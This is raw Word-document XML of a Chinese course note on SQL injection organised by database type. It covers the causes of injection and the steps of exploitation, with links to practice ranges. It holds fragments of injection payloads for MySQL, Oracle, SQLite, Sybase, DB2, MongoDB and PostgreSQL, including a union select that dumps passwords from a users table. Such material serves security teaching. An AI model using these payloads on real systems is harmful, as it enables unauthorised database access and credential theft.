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49CB" w14:textId="77777777" w:rsidR="00770E51" w:rsidRDefault="00770E51" w:rsidP="00770E51">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:pBdr>
          <w:bottom w:val="triple" w:sz="2" w:space="0" w:color="FC0403"/>
        </w:pBdr>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注入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数据库类型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用户权限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架构分层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符号干扰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利用过程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发现思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5ACBEF" w14:textId="33F04F34" w:rsidR="00770E51" w:rsidRDefault="00770E51" w:rsidP="00770E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FE576B" wp14:editId="05694E5F">
            <wp:extent cx="5269865" cy="164401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E6BD7" w14:textId="77777777" w:rsidR="00770E51" w:rsidRDefault="00770E51" w:rsidP="00770E5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知识点：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产生原理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&amp;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应用因素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Web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攻防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-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各类数据库类型利用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章节点：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待补充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OWTOP10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注入，文件安全（上传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下载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读取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删除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包含等），目录遍历，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SSRF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CRLF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SSTI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注入，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XML&amp;XXE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RCE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执行（代码或命令等）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反序列化，业务逻辑（验证码，接口枚举，支付购买，机制验证，越权，并发等）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未授权访问，失效访问控制，弱口令安全，第三方组件安全，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CORS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，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JSONP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等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158BCCAF" w14:textId="36AAC7CE" w:rsidR="00770E51" w:rsidRDefault="00770E51" w:rsidP="00770E51">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="both"/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56C87FA" wp14:editId="440CB5E4">
            <wp:extent cx="5269865" cy="585089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585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8042F" w14:textId="03A3A4E6" w:rsidR="00770E51" w:rsidRDefault="00770E51" w:rsidP="00770E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4FA94F12" wp14:editId="25492F2D">
            <wp:extent cx="5274310" cy="2760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548CF" w14:textId="77777777" w:rsidR="00770E51" w:rsidRDefault="00770E51" w:rsidP="00770E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lastRenderedPageBreak/>
        <w:t>演示案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC6D67C" w14:textId="77777777" w:rsidR="00770E51" w:rsidRDefault="00770E51" w:rsidP="00770E51">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:ind w:left="336" w:hanging="336"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pP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WEB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攻防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-SQL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注入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-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库类型利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031F301D" w14:textId="77777777" w:rsidR="00770E51" w:rsidRDefault="00770E51" w:rsidP="00770E51">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pP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数据库知识：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、数据库名，表名，列名，数据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、自带数据库，数据库用户及权限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、数据库敏感函数，默认端口及应用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、数据库查询方法（增加删除修改更新）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注入产生原理：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代码中执行的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语句存在可控变量导致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影响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注入的主要因素：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、数据库类型（权限操作）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、数据操作方法（增删改查）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、参数数据类型（符号干扰）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、参数数据格式（加密编码等）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、提交数据方式（数据包部分）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6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、有无数据处理（无回显逻辑等）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常见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注入的利用过程：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、判断数据库类型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、判断参数类型及格式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、判断数据格式及提交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、判断数据回显及防护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、获取数据库名，表名，列名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5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、获取对应数据及尝试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其他利用</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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#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黑盒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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="708090"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>白盒如何</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="708090"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发现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注入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盲对所有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参数进行测试</w:t>
      </w:r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、整合功能</w:t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点脑补进行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测试</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>白盒参考</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后期代码审计课程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利用过程：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获取数据库名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表名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列名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-&gt;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数据（一般是关键数据，如管理员）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靶场：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId8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http://vulnweb.com/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//mozhe.cn/Special/SQL_Injection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Access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：已经基本淘汰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意义不大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Mssql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http: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//vulnweb.com/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Mysql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//blog.csdn.net/weixin_57524749/article/details/140618103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database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hyperlink r:id="rId9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https://blog.csdn.net/A2893992091/article/details/141365829</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="708090"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ation_schema.tables where table_schema='mozhe_Discuz_StormGroup'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group_concat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column_name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columns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'StormGroup_member'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group_concat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StormGroup_member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Oracle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//blog.csdn.net/A2893992091/article/details/141365829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distinct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owner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all_tables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rownum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'2'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dual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user_tables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rownum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'2'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dual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user_tables whe</w:t>
      </w:r>
      <w:hyperlink r:id="rId10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https://blog.csdn.net/qq_32393893/article/details/103083240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column_name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all_tab_columns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rownum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'sns_users'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'2'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dual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column_name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all_tab_columns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rownum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'sns_users'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column_name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not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'USER_NAME'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)),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'2'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dual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USER_PWD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"sns_users"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USER_PWD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"sns_users"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user_name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not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in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'hu'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SQLite</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId11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https://blog.csdn.net/qq_32393893/article/details/103083240</w:t>
        </w:r>
      </w:hyperlink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sql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sqlite_master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WSTMart_reg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Sybase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db_name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mozhe_Deepthroat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dbo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sysobjects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mozhe_Deepthroat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syscolumns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object_id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'Deepthroat_login'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mozhe_Deepthroat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syscolumns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object_id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'Deepthroat_login'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&lt;&gt;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'id'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lastRenderedPageBreak/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all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hyperlink r:id="rId12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https://blog.csdn.net/m0_75036923/article/details/141364038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Deepthroat_lo</w:t>
      </w:r>
      <w:hyperlink r:id="rId13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https://blog.csdn.net/2401_88387979/article/details/144275425</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/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4274099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3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tables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server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sysibm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sysdummy1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tabname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tables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schema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colname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tabname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columns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schema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'GAME_CHARACTER'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colname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tabname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syscat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columns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tabschema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current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schema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'GAME_CHARACTER'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GAME_CHARACTER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0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=-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4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GAME_CHARACTER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limit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 </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="708090"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/m0_75036923/article/details/141364038</w:t>
        </w:r>
      </w:hyperlink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id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'});return ({title:'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',content:'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'});return ({content:tojson(db.getCollectionNames()),title:'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br/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'});return ({content:tojson(db.Authority_confidential.find()[0]),title:'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PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:br/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https:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="708090"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>//blog.csdn.net/2401_88387979/article/details/144275425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'null'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'null'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string_agg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datname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pg_database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string_agg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tablename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pg_tables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schemaname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'public'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string_agg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column_name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information_schema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.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columns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where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table_name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'reg_users'</w:t>
      </w:r>
      <w:r>
        <w:br/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and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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="9A6E3A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=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2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union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select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string_agg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name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string_agg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(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>password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,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="669900"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="999999"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="990055"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>null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Style w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> reg_users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E856C93" w14:textId="77777777" w:rsidR="00770E51" w:rsidRDefault="00770E51" w:rsidP="00770E51">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:pBdr>
          <w:bottom w:val="thinThickThinSmallGap" w:sz="48" w:space="0" w:color="030102"/>
        </w:pBdr>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>涉及资源：</w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="1E6FFF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>资源下载地址</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3FA32B68" w14:textId="77777777" w:rsidR="00770E51" w:rsidRDefault="00770E51" w:rsidP="00770E51">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="both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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B53C546" w14:textId="77777777" w:rsidR="00713539" w:rsidRPr="00770E51" w:rsidRDefault="00713539"/>
    <w:sectPr w:rsidR="00713539" w:rsidRPr="00770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E0176"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8BE6637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¡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¡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¡"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings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ED5"/>
    <w:rsid w:val="00713539"/>
    <w:rsid w:val="00770E51"/>
    <w:rsid w:val="00C3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C7772-4A69-42BC-A0D4-5C0B2E88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semiHidden/>
    <w:rsid w:val="00770E51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0E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0E5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70E51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770E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2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lnweb.com/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/2401_88387979/article/details/14427542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blog.csdn.net/m0_75036923/article/details/14136403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log.csdn.net/qq_32393893/article/details/10308324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s.qq.com/doc/DQ3Z6RkNpaUtMcEFr" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/qq_32393893/article/details/1030832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A2893992091/article/details/141365829" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/m0_75036923/article/details/14136403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tBao</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jackie tBao</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-07T08:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-07T08:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>